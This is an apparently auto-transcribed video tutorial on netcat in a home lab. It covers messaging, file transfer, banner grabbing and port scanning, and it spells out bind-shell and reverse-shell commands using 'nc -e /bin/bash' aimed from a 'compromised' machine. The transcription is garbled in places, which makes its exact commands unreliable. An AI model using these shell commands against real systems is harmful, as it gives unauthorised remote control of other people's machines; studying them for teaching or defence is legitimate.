Hello guys, welcome back. In this video, we're going to discuss about NetCat. NetCat is a very powerful tool. It's like a Swiss Army knife. You can do everything little bit with this NetCat. Okay, so if you want to see the man page on NetCat, here it is, man. NC NetCat is called as command as a NC. So you can see that. Sorry, I put the map, sorry, my typo mistake. NC, you can see that NetCat TCP IP Swiss Army knife. So it explains itself is a army knife. So actually it is deserve that one. It has everything to do. You can grab the banners from the scanning. You can scan the ports and also you can send the message. Even you can run the scripts remotely also. So this is very powerful tool for ethical hacking. If you want to inject, if you want to drag or bind shell, if you want to run the command through the bind shell, if you want to run the command in reverse shell also, it is very helpful tool. You have to learn this tool and it will uh, help you to capture the flags if you want to participate in any ethical hacking, and also it will help you to generate a proper, if you investigate the ports and investigate the loopholes and the sessions and ports. Okay, here you can see the how it will support. Okay, here I'm going from top to bottom. So minus C is a very specify the shell commands how you want to do that, and minus E is a very powerful tool. So you can inject any shell file or any command store. You can store any shell commands or any files or any scripts in a file, and do you can you can send execute that file on the remote host. And also gateways, and H for displaying help, I for delay intervals, how frequent you want to scan it or store that, and listen. L minus L means listen mode. So when you enter the netcat minus L and if you give the port number, so the it will create a session and it is waiting for connections to connect it. That means it's listening it. So minus n means it's a no DNS. It will only work with IP addresses. So this is in our test lab we do not have any DNS server. This is very helpful for us. And another one, minus P is mentioned in the port. Minus Q is seconds after end of this STDN. Minus B allow UDP broadcast. Minus R random local remote ports. And minus S source addresses. T enable telnet negotiation. Okay, minus u means you mention the UDP port, and v means verbose. C send CRLF line ending at the end. Minus z will help you to scan, used for scanning. Okay, so we will go in through some of these commands and I will explain how to grab everything. Okay, first thing what you have to do, if you want to, first I will show you how to start the session, listening session on the our Kali machine, and we go back to our, I have a Debian client here, so we will go back here and we will try to connect on that one. Okay, here I'm clearing the screen and netcat. So first we will see how to send the message between two server and client. We send those messages clear text. Okay, so netcat, I'm listening, I'm opening the port on this Kali machine listening. So I'm also want to verbose, and I'm mentioning n means is not looking for DNS, just connect with IP addresses. So we, in my test lab we do not have any DNS server, that is why I'm doing that. And P is port. So this is TCP, pure TCP connection. If you don't mention any switch about the ports, it's a TCP. So I am putting the port 1 2 3 4, or you can put any port if you want to test it present. So I'm just entering. So it start listening on TCP port now. Okay, I'm going here. Just I'm opening another tab. I want to show what is actually happening here. We discussed this SS in the previous videos. So here I have port 22 open. It is my SSH session running, and also we open port 1 2 3 4. So it is on listening state. So I'm clearing and we will start TCP dump here. TCP dump TCP. Okay, so sorry, we need to start this one sudo, yeah, sudo tcp dump tcp. Okay, so we will start the TCP dump. So it's started now. We're going back to Debian now. From Debian, we will run the netcat again. So we want to see what is the session we want to go. So my calling machine's IP address is 192.168.127.133. That is IP address of my calling machine. So we are connecting on 1234. So you see that it is connected now. So but you won't see anything, so we will say this is Debian machine. Hello colleague, how are you today? Okay, so these are the two messages we sent to our calling machine. So if you go back here and callie, you go here, so you see this message, this is Debian machine. Hello colleague, how are you today? Okay, so if you go here with TCP dump, we will capture all the SYN accessions and everything. Okay, I'm coming here, I'm explaining that those sessions now. Okay, we capture only the TCP session here. So the first 135, this is my Debian IP address, and we connected to Kali and 133 and port 1234. This is SYN. So this is first requested it. Then our Debian, their Kali replied on port 1234 to Debian SYN plus ACK. Then Debian is acknowledged and data transfer. This is push acknowledgement. So that means Debian send the message to the callee and push and acknowledge it. So then callee replied the acknowledgement. That means I receive the packet. Okay, I receive the packet. I'm acknowledging that. Then Debian send the another data. Then replied the callee replied to Debian. So this is the way you can customize. You can listen everything on network. If you can open to the, if you target, if you want to hack the any target, you have some, you do not have some permission, so you can execute the netcat. So netcat is, you don't need even sudo permissions to connect the netcat. Otherwise you can connect from that target to your machine. If you have any reverse shell scripts, so you can upload those scripts. I will explain next one. Next one, in a scan mode, if I want to scan something, or if I want to find the SSH version, so here I mentioned that we are running here SSH session. So if I see SSTAN, so you can see that we are running 1234 and SSH session. So if I go back to the Debian, yeah, I don't want to do anything now here, close it. So we're going to netcat. I'm not mentioning any port. I'm sorry, I'm not mentioning any connections or anything. So we are not even 1234 running, but we are not in listening state here at the moment. So you can see that we close that connection. So from the Debian, if I want to know what is the SSH version, or if you want to know what is the web version is target is running, you need to scan the versions. So you can use nmap also to scan everything, OS versions, what is any, if is any FTP session run, a service running on it, if you want to find the version. So here 192.168.127.133 port 22. The SSH session is running on port 22. If I do that, you can, it is clearly mentioned the all the version of the SSH. So SSH 2.0, Open SSH 8.3 P1 Debian. So if you find this version, you can go to exploit DB. Then you can search what exploits you can find it on it. Now you can have on that version. Otherwise you can go to Metasploit. So we will discuss in the next future videos about Metasploit framework, Metasploit and everything. But first you need to know how to slowly, we need to get onto the how to build our tools, and how to, we have to know how to use those tools first. Otherwise you can't jump onto the machine target, you can't do anything. You can watch many videos on those things, but you need to know how to use those tools step by step. So that's why at this way, one way we can use netcat and scan the versions or change the messages. And another thing, even here we display the messages. Yes, so we display the message. No, I do not want to display any message. If you want to store that message into any logs, so if you want to store that message into any text, so what we have to do, we have to do netcat, and I'm going to do same thing, lvnp, yeah, and port 12345. Yeah, it doesn't matter, you can mention any port. So I am redirecting that to what is that, is a charting. Okay, charting dot log. Okay, so we are redirecting that messages into those charting dot log file, sorry, log file. Okay, here it is. So I'm start listening on 12345. I'm going back to Debian, and we will connect that back to Debian, Kali from there, and we will do that again. So netcat here is 12345. Yeah, so we are connected. Hello Kali, I'm Debian again. Okay, how are you now? So this is a message we are typing it. Okay, we are sending these messages to the Kali machine here. So here it is, we're going back to Kali again. So we can't see any messages here, but all the messages redirected to chatting.log. So I'm closing this one. So if you see the ls, here you can see that chatting.log file. Okay, if I want to display cat chatting.log, so you see the hello Kali, I'm Debian again. How are you now? So this is the way you can store messages, and you can move the data from one client to server, server to client. You wherever you can run in direction, whichever direction you want to move the data. So this is the type of loopholes you will find in some, if you're trying to if you're trying to find assign, if you are doing any assessment on the client side, if you're doing assessment on your ethical hacking report, so you have to show this one, how can you move the messages, or how can you move data from the company to the your side, and you have to put all these logs onto your document. Okay, when you are doing documents, you have to put all the screenshot how you moved it. So how can you have to recommend them how you can block these things. Okay, so please be careful, but don't use for any illegal purpose these things. Okay, then we discussed about moving the data in directions and commands. Yes, so now I'm going to show how to transfer the file data. Yeah, next thing, what I'm doing, I'm creating one file here. No test, just I'm creating test. I'm putting some words here. uh Hi, how are you? Yeah, this is Kali machine. Okay, I'm putting some lines here, that's why I'm just putting some, I'm not writing all the documents, so just I'm putting that. I'm saving this, I'm exiting. So we created that everything, and I'm clearing now. So what we are doing, we are putting that, we are injecting this file into our session. So netcat, yeah, minus lvnp, that's the same options I'm doing it. So what the port 9876, I'm using different port, you can use any ports, I'm just using 9876. Okay, so I'm injecting that into here. So what is the test? Yeah, so we are doing test file injecting there. So this one is we are going back to our Debian machine, so we want to see the data now. Okay, I'm clearing that. So what are you doing here? We are going on 9876 port. Yes, when you connect a 9876, you will get all those whatever we did there. Okay, so I hope you guys understanding where I am going from here. So we just move the data between these two one. Now I put some words here. So if I put some commands in a words place, if I put some script in this words place, what it will happen? Okay, I'm going to show that now. Okay, so I'm closing here. We are going back to Kali. So you seen that one, how I am doing did that. Now I'm going to create some script now. So test.sh. Okay, I'm creating one script. Sorry, I got this test.sh already. So we're going to create another one. Nano Kali dot sh. Okay, so cali, this is cali dot sh. So we are going to present working directory. I want to find, I want to display date. Yeah, I want to display some other commands. What we will display? ls. Okay, so this is, I'm just doing those commands. This is only control x. Yes, yes. So when we did this one, but you need to change the permission before, otherwise it won't work, guys. So you have to change permissions and cali.sh. Okay, then I'm doing netcat. So what am we doing? Netcat, we have to feed this file. Okay, feed this file. I'm going to show something now here. Netcat -h. Okay, so here is the one. When you want to feed the file name -e, so -e is with the script program to execute after connect. So you see that they mentioned is dangerous. So you can see clear these two commands. Please use carefully when you are doing this one, otherwise it will, you will face a lot of legal issues using this command. So you must be very careful when you are using this -e or -c. Okay, please very careful, guys. Okay, I'm doing here clear now. So I'm doing netcat. We are doing the -lnvp, same thing. I'm not going to any change. This is a basic one. Listening, L means, V means verbose, N means no DNS, and P is port. Okay, so you are, we every time we use same commands every time. So I'm putting 9876 same port, it doesn't matter, and I'm doing his -e. We have to use this -e option to inject our script. Okay, call it dot sh. Sorry, doing, we got in the same directory, yes. Sh. Okay, that's it. So we are listening 9876. We are in same directory. Going back to Debian now. I'm clearing this screen, and we going to same 9876. Okay, guys, something is wrong happened here. Netcat 133. So we're going back here. What is happening? Oh, sorry. Something format error is happening here. So we have to check what is happening here. Okay, guys, here is the problem. My host name is Kali and I'm trying to inject the script in using same name, so it is not working. So if I use the script whichever I used test before, so we will use same file again. So it's the same thing. If you see the same commands, I put that into test one also. So test.sh. So you see that the same commands I tested before. So present working directory date ls, I just put those files. So that's the same thing we will inject here now. So what we will do is a netcat minus l lvnp, yeah, and then we will do the our port 9876, then -e option and test.sh. Okay, so we will do the same one, the same, when I written the script same as my host name, so it is not running, something is conflict in Linux somewhere, so we will use the different one. Okay, now I am doing nc 192.168.127.133 and I'm going 9876. Yeah, so you see that, guys, I put the present working directory, home Ricky, the date and ls. So please be careful when you're running that. If you, I'm not doing any illicit scripts here, this is just normal commands I use, shell commands, so that is why it's is executed. But when you're writing any illicit scripts, please be careful, don't damage other people's systems. Okay, this is a basic script executing and like that. Okay, now next thing, we need to talk about the main thing whenever you are entering to the real field. The thing is you have to use reverse shells and bind shell. What is bind shell is? Bind shell is a shell binds to a specific port on target to host to listen on incoming connections. Okay, it's a bind shell. I'm showing with the example so you guys will understand first. Okay, otherwise you will confuse what I'm talking about. So and the same thing, I'm going back to Kali. This is my machine. So when I'm trying to do that, so I want to execute the commands or I want to do something on a target system. So I'm opening first. So I'm coming from the my Debian. So I'm going from here. So you will see that what I'm doing netcat I am doing on minus lnvp. Okay, that's the same every time we will use maximum except scanning. I will show you scanning after this one. That's it. Then I'm putting 9876. That's a command 9876, and I'm using minus e. So we same thing, but I am putting my bash environment here. You guys know that. So when I am putting the bash environment through the 9876, okay? So this is listening. So how you going to use this in your field? Bind shell means you are doing inviting the shell into your thing. So you're binding that shell, your bash shell into 9876. Whoever connected on that port, uh, they can execute all the shell commands. Okay, so you will see these scripts and everything, bind shell, reverse shell in Metasploit framework also, and also if you want to write your own bash scripts, you can do that also. Okay, I'm going Debian now. I'm going on to connecting the 9876 again. You see that you don't see any blank, but you can execute all bash commands now. Date, okay, present working directory, home wiki, yeah. You can see the ls, all the data structure. You can go on to cd desktop. So I am connected from my machine to bind shell. We are open listening port on our Kali, and we are connecting from Debian to Kali and executing all the commands on Kali. So I'm connecting on desktop. You can on desktop, if I see the ls is only hash.txt file is there, but I'm creating one file, touch testing bind.txt. Okay, so I'm creating the file. If you go back to here, Polly, yeah, if you go back to see here on the desktop, we got testing underscore dot bind hyphen dot text file. So we created that file on our desktop on the calling machine. If you see what ports are listening, same 9876 and SSH port, but we are not connected SSH port. We are connected an 133 port. Okay, if you want, you can scan everything using TCP dump. Yeah, you can dump it and you can analyze the data also, where is connection coming from. Okay, that's it for this is bind shell. You can execute. So that is why NetCat is very powerful tool. It you can do with NetCat everything little bit, not completely, but everything you can do everything like Swiss Army knife. How you can use that one? You can do everything, but little bit, not completely, like certain emergency purpose. Okay. Now reverse shell. What is reverse shell actually? Okay, when reverse shell is you are establishing the connection but creating from different way. So here and this machine and Kali we will do that, bin that bash we did that. So what will happen, we're going to carrot first. We are reverse shell, we are not, before we are put a listening port on our Kali machine, but now listening put we will do it on Debian. So okay, and Debian what we will do, netcat say minus listening lvnp, so verbose and no domain DNS and port, and we will put what we will put 4567 port. Okay, so I am putting 4567 port here. Yeah, so I am listening here 4567 and we doing reverse connection. So we are listening there, but when we establish from target, this, if we think this is a target, we want to exploit this one. So what we will do, we will do nc, yeah, netcat again. What we'll do 192.168 127.135. This is our 135 is our Debian machine, and 4576, and we are inviting that with the bash. Okay, bin that bash. Okay, you guys understanding here? Sorry, connection is refused. We will check what is happened here. Debian 4576. Okay, this is IP address. What is the IP address? Is open tab. IP address is 135. Yeah, that's right, 135. Just a minute, I'm checking IP tables, guys. Sometimes IP tables running on this one. So if you don't know what is IP tables, you can watch my previous video. I explained everything, how to configure IP tables and everything. Okay, no IP tables, it should work. What is SS? STAN. Okay, tan is 4567 is open, it is listening. So you guys, I explained these all commands in basic network tutorial, so you can go and check if you don't know these commands. And it is listening on 4567, so it is waiting that. So we're going to call it here. So what is doing here? NetCat, we're doing 4567 and -e bin bash. Okay, that's right. I'm doing fine. Connection refused. Okay, guys, something is nasty happening here. So I will check on firewalls. Anything here? Sudo IP tables -l. Okay, no firewalls. IP tables are here even. We come back here. Why is rejecting it? I will kill that again. Netcat -l vmp4567. Is that any service is running on this one? lsof and I and P. There's nothing is running. So we will check again what is happening again. nc netcat, we will sudo, maybe we will execute with sudo. Okay, this one. Okay, still is closing the connection. Now I will check what is happening here. Okay, guys, something is not, my Debian is not accepting the connections. I will troubleshoot this later, but okay, we will do in reverse way. So our listening port is, I'm putting the listening port on my Kali. So that means we are executing from my Kali to actually I'm inviting on other machine to connect to my Kali machine. If it's a Kali as a server, I'm inviting Debian to connect this one, but we are executing commands from Kali to other machine. So I'm explaining here. If you are ethical hacker, you are sitting, you are working on Kali Linux. Okay, so you are attacked one machine, you compromise the machine, but you want to shell from that target to your machine. So what you have to do on your target, you have to execute this command netcat, just netcat -lvnp. So I mentioned that is just 9876. Okay, so when you execute that, it will start listening it, and then you execute the sorry, you just you are executing, uh, you are connecting from your client target at a compromised PC to your uh, Kali machine. Okay, here we are going to establish the Kali machine netcat -lvnp, so 9876. Okay, we are start listening on our Kali. So we want to reverse shell. We are compromised this machine, but we can't run the command. So what we have to do, you have to connect reversely from compromised machine to your Kali machine. So what you have to do here, netcat 192.168.127 dot 133.9876, and you are giving your command, your shell, your shell is a, which is a compromised machine shell, to your uh, uh, your calling machine. So you can execute commands, everything from your calling machine. Okay, so I'm started it. Okay, but if you go back your calling machine, so you are established the connection from there to here, but you are executing every command from your calling machine. If you see that this is my Debian machine, if you see that lsb underscore release minus a, so you see that it's a Debian Linux buster, so you can see the all the versions. Okay, and if you want to do cd desktop, okay, we go into desktop and you create a touch file also, the reverse from poly Debian, okay, .ext. Okay, that's the file we created. Okay, if you go back to Debian, you will see that file here. Okay, so this is a very reverse shell. If you compromise one machine but you not allowed to execute some command, but you can put that session back to your machine and you execute everything from your Kali machine. Okay, this is the way you can put reverse shell. That means you are establishing a connection from compromised machine to your Kali machine. Okay, this is the way you put that one. Okay, that's the reverse shell. So what is the scanning? How you do the scanning actually? So you just need to do just z in it and see. Okay, we are SSH running here, and we also opened any ports here. Now I'm checking any ports we are open. SS minus 10. Sorry, I put that netcat and SS both together. Okay, we are 229876, both are open, so we will go back and here and Debian we will check that. So netcat z and 192.168.127.133. Okay, so I want to scan those ports from 1 to 100. Oh, sorry, 9876 is outside 100, but I'm scanning 1 to 10,000. Okay, it is doing something. Come on. Okay, something is wrong, is not scanned anything actually. Yeah, guys, here it is. We're going to do that. Actually, it was working, but we mistakenly not enable the verbose. That is why I'm confused. Okay, the V is verbose, but I'm enabling double verbose. That means it will give you all single, every single message it will generate. Okay, we are going to do 192.168.127 dot and 133. Okay, we are scanning ports from 1 to 10,000. Our listening port is 9876. That is why I'm doing up to 10,000. So when I click that, you see that it just refused all the ports. But if I go here 9876, you will see here 9876. The guys is sorry. Okay, 9876 is open here, and if you go to the SSH port here, you will see that one also open here. So this is the way you can scan the. It is very quick. It will do very quickly all this. The remaining ports are refused, closed, refused, and thing. But if you see the 22 port, it will scan the 10,000 ports in few seconds. So this is the specialty of NetCat. So I hope you understand very well with this netcat what you can do, how you can do that. I hope you guys uh, understand very well with this one. Thank you for watching this video. Please subscribe for latest updates on ethical hacking and Linux, more on Linux basics and Linux commands. So we will build step by step into our network ethical hacking professionally. Okay, thank you for watching this. Please subscribe. Bye.